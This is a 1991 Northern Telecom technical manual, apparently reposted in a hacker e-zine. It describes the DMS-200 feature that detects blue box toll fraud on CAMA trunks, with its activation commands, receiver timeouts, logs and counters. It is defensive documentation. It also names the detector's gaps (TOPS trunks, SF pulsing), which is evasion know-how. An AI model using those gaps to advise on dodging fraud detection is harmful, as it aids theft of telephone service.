term .blue box fraud.. The Blue Box Fraud Detection feature discovers fraudulent MF signaling over Centralized Automatic Message Accounting (CAMA) and SuperCAMA trunks. It does not detect fraudulent signaling over Traffic Operator Position System (TOPS) trunks. The Blue Box Fraud Detection feature can alert the operating company of a fraudulent call attempt and either allow billing to be made for the call or disconnect the call. This feature detects fraudulent MF signaling but does not detect fraudulent SF pulsing. No customer data schema is required, because the feature is activated and deactivated using the Command Interpreter (CI) facilities at the Maintenance and Administration Position (MAP). The feature implements the method of detection of fraudulent telephone calls described in U.S. patent 4,001,513. Blue Box Fraud Detection Feature Description BCS22 and up 2-1 Description The Blue Box Fraud Detection feature allows the DMS-200 to perform three fraud detection functions: � test for fraudulent calls � record fraudulent calls � dispose of fraudulent calls (cut or continue). Those events are described in the remainder of this chapter Figure 2-1 describes how a perpetrator initiates a fraudulent call. Figure 2-1 Fraudulent call setup To place a fraudulent call, the perpetrator first places a normal call. The End Office sends the digits to the CAMA office. The CAMA office receives and translates the digits from the End Office, and seizes an outgoing trunk. The Office at the far end of the outgoing trunk winks in response, and the CAMA office sends the called digits for this normal call. No fraud has taken place yet. END OFFICE CAMA OFFICE DMS 200 0 0 CAMA TRUNK OUTGOING TRUNK WINK 2-2 Description 297-1001-132 Standard 02.02 March 1991 Figure 2-2 describes how the system responds to a fraudulent call, and how the testing procedure is invoked. Figure 2-2xxx Fraudulent call system response To place a fraudulent call, the perpetrator first places a normal call. The End Office sends the digits to the CAMA office. The CAMA office receives and translates the digits from the End Office, and seizes an outgoing trunk. The Office at the far end of the outgoing trunk winks in response, and the CAMA office sends the called digits for this normal call. No fraud has taken place yet. END OFFICE CAMA OFFICE DMS 200 0 0 CAMA TRUNK OUTGOING TRUNK WINK BLUE BOX Description 2-3 Blue Box Fraud Detection Feature Description BCS22 and up Testing for fraudulent calls Triggered by the unexpected wink, the DMS-200 begins to test the suspected fraudulant call. Figure 2-3 describes how the DMS-200 prepares to test for fraudulent calls. Figure 2-3xxx Reserved multifrequency receiver END OFFICE CAMA OFFICE DMS 200 0 0 CAMA TRUNK OUTGOING TRUNK WINK BLUE BOX reserved MFR broadcast connection To test the call, the DMS-200 establishes a broadcast network connection from the suspected incoming CAMA trunk to a reserved MF receiver (MFR). These MFR are reserved when the feature is activated. As long as the feature is active, the reserved MFR are not available for standard call processing. NOTE: The number of MFR set in reserve depends on the number of simultaneous fraud attempts expected. For providing MFR refer to Provisioning, 297-1001-450. Following is a description of the events that occur after the MFR is attached. 2-4 Description 297-1001-132 Standard 02.02 March 1991 Table 2-1 describes the events that occur after the MFR is attached. After attaching the MFR, the DMS-200 waits for one of the events shown in the .Event. column of Table 2-1 and responds to that event as shown in the .System response. column of the same table. Table 2-1 also includes an .Explanation. coulmn to clarify circumstances and conditions surrounding the event being described. Table 2-1xxx MFR attachment response Event Explanation System response Wink Wink on the same trunk again. Reset the MFR timeout and continue to wait. Digits A fraudulent set of called digits has been received. Provide the charge utility with these digits and use the Automatic Message Accounting (AMA) Event Information Digit to flag this call as a Blue Box call. Release the MFR. If the CUT option was specified from the MAP, disconnect the call. Refer to Commands on page 4-1 for information about the CUT option. Call Failure Mutilated digit(s) detected by the MFR. Several things could cause this: � the call may have released � there may be a real transmission problem � the perpetrator may be using SF pulsing Release the MFR and assume no fraud has taken place. MFR Timeout This time allowed to detect possible fraudulent MF digits has expired. Release the MFR and assume no fraud has taken place. Page 1 of 1 Description 2-5 Blue Box Fraud Detection Feature Description BCS22 and up Recording fraudulent calls The DMS-200 performs the following actions after detecting a fraudulent call: � If the CUT option was not specified, replace the original digits in the charge buffer with the fraudulent digits. Note: If the perpetrator places more than one fraudulent call, only the last call appears in the charge buffer. � Set the AMA event information digit to mark the call as a blue box call. See document Automatic Message Accounting - Northern Telecom Format, 297-1001-119. � If the office is performing AMA recording for this call, generate a log to alert the operating company office that a Blue Box call is in progress. � See if the ALARM option was specified at the MAP, generate a visual/ audible minor alarm. Disposing of fraudulent calls There are two options for disposing of fraudulent calls: Cut the call or continue the call. Cut the call To cut a fraudulent call, the DMS-200 performs the following actions: � releases the MFR � releases the connection between the originating and terminating agents of the call � processes the AMA information � deallocates the terminator � sets treatment for the originator. Continue the call If the CUT option was not specified, the DMS-200 releases the MFR and the call continues. The perpetrator is billed based on the fraudulent digits. When the subscriber disconnects the call, the system generates a log and turns off the alarm if the ALARM option was specified. Blue Box Fraud Detection Feature Description BCS22 and up 3-1 Operational measurements The Operational Measurement BLUEBOX is associated with the Blue Box Fraud Detection feature (see Operational Measurements (OM), 297-1001-814, for more information). The CI command OMSHOW BLUEBOX will display the contents of each field. BLUEBOX has the following fields: Table 3-1xxx Blue box fields Field Description BBWinks Number of unexpected winks detected on incoming CAMA trunks. These winks could indicate fraudulent calls. BBAttach Number of successful MFR attachments to suspected trunks. BBDetect Number of fraudulent calls detected. Page 1 of 1 Blue Box Fraud Detection Feature Description BCS22 and up 4-1 User interface The Blue Box Fraud Detection feature is activated by a CI command issued at the MAP. The same command can be used to query the status of the feature. The following section describes the syntax and options of the commands. Commands BLUEBOX ACT CLR nmfr timeout ALARM CUT activates, clears, or queries the status of the Blue Box Fraud Detection feature. Activating the feature reserves the specified number of MFR. Clearing the feature returns the MFR to the common pool. Where: ACT activates the blue box feature and reserves the specified number of MFR. CLR deactivates the blue box feature and returns the MFR to the common pool. nmfr specifies the number of MFR to be reserved. � Range: 1 through 3. � Default: 1. timeout specifies the number of seconds the MFR will wait for digits. � Range: 5 through 35. � Default: 30. 4-2 User interface 297-1001-132 Standard 02.02 March 1991 ALARM specifies that an audible/visual alarm will be generated when a Blue Box call is detected. CUT specifies that fraudulent calls will be disconnected. If this parameter is not specified, the fraudulent call will continue. Note: 1 The activation parameters are position-dependent. That is, nmfr must be specified before timeout; both nmfr and timeout must be specified before ALARM or CUT. Note: 2 The BLUEBOX command issued without any parameters queries the system for the feature status. Examples: 1 Activate the blue box feature using only the default parameters. The user enters the following CI command: BLUEBOX ACT The system responds with the feature status and parameters: Bluebox Fraud Detection Feature Status: Active. 1 MFR reserved, timeout set to 30 seconds. 2 Activate the blue box feature and reserve two MFR. The user inputs the following CI command: BLUEBOX ACT 2 The system responds with the feature status and parameters: Bluebox Fraud Detection Feature Status: Active. 2 MFR reserved, timeout set to 30 seconds. 3 Activate the blue box feature and reserve three MFR with a timeout of 22 seconds. The user inputs the following CI command: BLUEBOX ACT 3 22 The system responds with the feature status and parameters: Bluebox Fraud Detection Feature Status: Active. 3 MFR reserved, timeout set to 22 seconds. User interface 4-3 Blue Box Fraud Detection Feature Description BCS22 and up 4 Activate the blue box feature with the ALARM option. Reserve one MFR with a timeout of 30 seconds. The user inputs the following CI command: BLUEBOX ACT 1 30 ALARM The system responds with the feature status and parameters: Blue Box Feature Status: Active. 1 MFR reserved, timeout set to 30 seconds. Detection will report alarm. 5 Activate the blue box feature with the CUT option. Reserve two MFR with a timeout of 25 seconds. The user inputs the following CI command: BLUEBOX ACT 2 25 CUT The system responds with the feature status and parameters: Bluebox Fraud Detection Feature Status: Active. 2 MFR reserved, timeout set to 25 seconds. Detection will cut off call. 6 Determine the status of the blue box feature. The user inputs the following CI command: BLUEBOX If the feature is not active, the system responds with: Bluebox Fraud Detection Feature Status: Inactive. If the feature is active, the system responds with the feature status and parameters: Bluebox Fraud Detection Feature Status: Active. 2 MFR Reserved, timeout set to 35 seconds. Detection will cut off call. 7 Deactivate the blue box feature and return the MFR to the common pool. The user inputs the following CI command: BLUEBOX CLR The system indicates command execution with the response: 4-4 User interface 297-1001-132 Standard 02.02 March 1991 Bluebox Detection Feature Cleared. Q BLUEBOX queries the system for the syntax of the BLUEBOX command. Example: Display the BLUEBOX command syntax. The user inputs the following CI command: Q BLUEBOX The system responds with the following syntax diagram: Parameters for Bluebox Fraud Detection Parms: [ {CLR, ACT [ {1 TO 3}] [ {5 TO 35}] [ {ALARM, CUT}]}] Alarms If the ALARM option is specified, a minor office alarm is activated whenever a blue box call is detected. The office alarm is deactivated at call disconnect. Logs The following six logs are associated with the Blue Box Fraud Detection feature: � AUDT118 � EXT106 � TRK151 � TRK152 � TRK153 � TRK154. The following is a brief description and example of each log. See Log Report Manual, 297-1001-510, for more detailed information. User interface 4-5 Blue Box Fraud Detection Feature Description BCS22 and up Table 4-1xxx Log description Log Description AUDT118 The Audit subsystem generates this log when Blue Box Fraud Detection feature data is inconsistent with the corresponding MFR data. The identified MFR cannot be used for fraud detection until the problem is cleared. Example: AUDT118 APR12 12:00:00 2112 FAIL BLUEBOX MFR LOST CKT RCVRMF 1 EXT106 The External Alarms subsystem generates this log when a fraudulent call is detected and when that call disconnects. Example: *EXT106 MAR14 12:00:00 2112 INFO BLUEBOX ON CALL DETECTED TRK151 The Trunk Maintenance subsystem generates this log when the Bluebox Fraud Detection feature is activated. Example: TRK151 APR11 12:00:00 2112 INFO BLUEBOX DETECTION ACTIVE # OF MFRS = 2 ALARM ENABLED CKT RCVRMF 0 CKT RCVRMF 1 CKT RCVRMF 2 TRK152 The Trunk Maintenance subsystem generates this log when the Bluebox Fraud Detection feature is deactivated. Example: TRK152 APR04 12:00:00 2112 INFO BLUEBOX DETECTION CLEARED Page 1 of 2 4-6 User interface 297-1001-132 Standard 02.02 March 1991 Table 4-1xxx Log description (continued) Log Description TRK153 The Trunk Maintenance subsystem generates this log when the Bluebox Fraud Detection feature is active and a fraudulent call is detected. Example: TRK153 APR16 12:00:00 2112 INFO BLUEBOX CALL DETECTED IC TRUNK = CKT RTP2W 1 CALLING # = 9197811199 OG TRUNK = CKT CARY2W 2 CALLED # = 61247418888 CALLED # REPLACED BY 3152651234 CALLID = 123456 TRK154 The Trunk Maintenance subsystem generates this log when the Bluebox Fraud Detection feature is active and a fraudulent call is disconnected. Example: TRK154 APR11 12:00:00 2112 INFO BLUEBOX CALL DISCONNECT CKT APEX2W 1 CALLING # = 6133628669 2 CALLED # = 6124741888 CALLID = 123456 Page 2 of 2 Blue Box Fraud Detection Feature Description BCS22 and up 5-1 List of terms AMA Automatic Message Accounting Automatic Message Accounting An automatic recording system that documents all the necessary billing data of subscriber-dialed long distance calls. Batch Change Supplement A DMS-100 Family software release. BCS Batch Change Supplement CAMA Centralized Automatic Message Accounting A system that produces itemized billing details for subscriber-dialed long distance calls. Details are recorded at a central facility serving a number of exchanges. In exchanges not equipped for automatic number identification, calls are routed to a CAMA operator who obtains the calling number and keys it into the computer for billing. CI Command Interpreter Command Interpreter A Support Operating System component that functions as the main interface between machine and user. Its principal roles are: 1 To read lines entered by a terminal user. 2 To break each line into recognizable units. 3 To analyze the units. 4 To recognize command item-numbers on the input lines. 5 To invoke these commands. 5-2 List of terms 297-1001-132 Standard 02.02 March 1991 Maintenance and Administration Position A group of components that provide a man-machine interface between operating company personnel and the DMS-100 Family systems. A MAP consists of a Visual Display Unit and keyboard, a voice communications Module, test facilities, and MAP furniture. MAP is a trademark of Northern Telecom. MAP Maintenance and Administration Position MF Multifrequency MFR Multifrequency Receiver Multifrequency A method that makes use of pairs of standard tones to transmit signaling codes, digit pulsing, and coin-control signals. Northern Telecom Practice A document that contains descriptive information about the DMS-100 Family hardware and software Modules, and Performance Oriented Practices for testing and maintaining the system. NTP.s are supplied as part of the standard documentation package provided to an operating company. NTP Northern Telecom Practice PEC Product Engineering Code Product Engineering Code An eight character code that provides a unique identification for each marketable product manufactured by Northern Telecom. SF Single Frequency Single Frequency A signaling method using a 2600 Hz tone to transmit and receive on-/offhook address and supervisory signals. SF is used in conjunction with E and M signaling on four-wire trunk facilities. List of terms 5-3 Blue Box Fraud Detection Feature Description BCS22 and up TOPS Traffic Operator Position System Traffic Operator Position System A toll operator.s position consisting of a video display and keyboard for monitoring call details and entering routing and billing information. TOPS is a trademark of Northern Telecom. |=[ EOF ]=---------------------------------------------------------------=|